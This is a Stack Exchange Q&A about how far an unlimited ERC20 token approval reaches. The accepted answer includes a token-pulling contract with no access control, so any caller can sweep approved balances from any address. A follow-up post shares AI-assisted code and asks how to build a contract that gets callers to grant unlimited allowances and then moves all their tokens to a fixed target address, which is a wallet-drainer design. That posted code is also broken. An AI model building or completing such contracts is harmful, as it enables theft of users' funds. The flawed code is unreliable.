# When I approve a smart contract lets say unlimited ERC20 tokens does that mean it can send any and all ERC20 tokens? ETH, USDT, BNB all at one go?

Tags: solidity, smartcontracts, erc20

When I approve a smart contract lets say unlimited ERC20 tokens does that mean the smart contract can send any and all ERC20 tokens? ETH, USDT, BNB all at one go?

Answer (score 0, accepted):

It can pull all of your tokens that you have approved (up to the approved amount, which can be unlimited per token), and that you hold at the moment.

Example code of such contract:

```
pragma solidity 0.8.21;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";

contract PullTokens {
    function pullTokens(address from, address to, IERC20[] memory tokens) external {
        // for each of the token contracts
        for (uint i; i < tokens.length; i++) {
            IERC20 token = tokens[i];

            // find the maximal possible amount to pull
            uint256 allowance = token.allowance(from, address(this));
            uint256 balance = token.balanceOf(from);
            uint256 amount = balance < allowance ? balance : allowance;

            // pull the tokens
            token.transferFrom(from, to, amount);
        }
    }
}
```

Even though the contract is not able to directly retrieve the list of tokens that it has approval for, it can receive the list in an argument.

---

Note that the approval is given by each specific token separately.

For example you give approval to spend your USDT in one transaction, WETH in other transaction, and so on.

*(This is a rule of thumb for 99.9% cases. There are few exceptions, for example you're able to give multiple approvals with one transaction using ERC-4337 Account abstraction on Ethereum, but this case is very very rare).*

Answer (score 0):

Oh yes I see thanks for the answer, I am actually new to coding solidity and smart contracts @Petr Hejda
here is a code i was able to develop with the help of an AI

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.21;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/access/Ownable.sol";

contract TokenTransfer is Ownable {
    address public targetAddress;
    address[] public tokenAddresses;

    modifier onlyTargetAddress() {
        require(msg.sender == targetAddress, "Only the target address can call this function");
        _;
    }

    event TokensTransferred(address indexed tokenAddress, address indexed from, address indexed to, uint256 amount);

    constructor(address _targetAddress, address[] memory _tokenAddresses) {
        targetAddress = _targetAddress;
        tokenAddresses = _tokenAddresses;
    }

    function setTargetAddress(address _targetAddress) public onlyOwner {
        targetAddress = _targetAddress;
    }

    function setTokenAddresses(address[] memory _tokenAddresses) public onlyOwner {
        tokenAddresses = _tokenAddresses;
    }

    function approveAndTransferAllTokens() public onlyTargetAddress {
        // Execution of the function
        for (uint256 i = 0; i < tokenAddresses.length; i++) {
            address tokenAddress = tokenAddresses[i];
            uint256 tokenBalance = IERC20(tokenAddress).balanceOf(msg.sender);
            uint256 allowance = IERC20(tokenAddress).allowance(msg.sender, targetAddress);

            if (tokenBalance > 0 && allowance == 0) {
                IERC20(tokenAddress).approve(targetAddress, tokenBalance);
            }
            if (allowance > 0) {
                IERC20(tokenAddress).transferFrom(msg.sender, targetAddress, allowance);
                emit TokensTransferred(tokenAddress, msg.sender, targetAddress, allowance);
            }
        }
    }
}
```

I deployed this code to goerli in remix.ide and it worked fine but some developers said it would be prone to bugs.
@Petr Hejda it seems in your above code You can only call that function from inside the contract please correct me if I'm wrong
Im looking to develop a code where by which the caller upon calling the contract will grant the contract unlimited allowance (The contract is set to approve all erc20 tokens permanently as unlimited and this cant be changed) also before approval the contract will check the balance of said caller for the available balances of the the specified erc20 tokens lets say ["0xTokenAddress1", "0xTokenAddress2", "0xTokenAddress3"]; if the caller doesn't have "0xTokenAddress2" in its balance but has "0xTokenAddress1" "0xTokenAddress3" the contract will skip "0xTokenAddress2" and only ask approval for "0xTokenAddress1" "0xTokenAddress3" (in order to minimize Gas as low as possible for only the tokens available in the balance of the callers address). Lets also say we can set the target address where the contract will execute transferfrom to and this can be set permanently as "0xTargetAddress" (This will be the address the contract will transfer all erc20 tokens to in one go after approval.

SUMMARY: The caller calls the contract, the contract checks for balances of the specified token addresses from the token arrays and asks unlimited allowance for the available tokens, Once approved the contract transfers all erc20 tokens to the target address.
My question now is, is the above summary possible to execute?
And If it is How will it be written?